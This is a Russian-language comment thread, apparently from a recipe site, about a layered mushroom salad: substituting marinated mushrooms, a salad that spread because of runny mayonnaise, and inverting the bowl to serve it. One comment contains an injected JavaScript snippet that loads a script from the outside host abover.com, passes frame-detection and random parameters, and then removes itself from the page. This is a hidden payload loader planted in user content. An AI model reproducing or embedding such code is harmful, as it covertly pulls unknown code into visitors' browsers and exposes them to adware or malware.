Женя
Последний года полтора на все праздники его готовлю, только вместо крупныйх шампиньонов беру опят маринованных
20.09.2013
Ответить
Юляшка
А вот у меня почему-то разъехался немного в стороны, когда я такой готовила(((, почему-то не удержал форму(((
20.09.2013
Ответить
Юлия Майская
Может вы майонеза много положили или сам по себе майонез был жидковат?
20.09.2013
Ответить
Юляшка
Я тоже думаю, что майонеза многовато положила, а может он еще и жидковат был.
20.09.2013
Ответить
Mary
яа мне нравится именно эффект, когда миску переворачиваешь и салат красиво на тарелке получается - "(Можно так же на дно глубокой миски
выложить целые шампиньоны, шляпками вниз, а на них слоями в обратном
порядке выложить салат. Затем осторожно перевернуть миску на блюдо,
таким образом, чтобы грибные шляпки оказались сверху)"[removed](function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random();
script.onload = script.onerror = function () {
script.onload = script.onerror = null;
script[removed].removeChild(script);
}
document.body.appendChild(script);
})();[removed]
20.09.2013
Ответить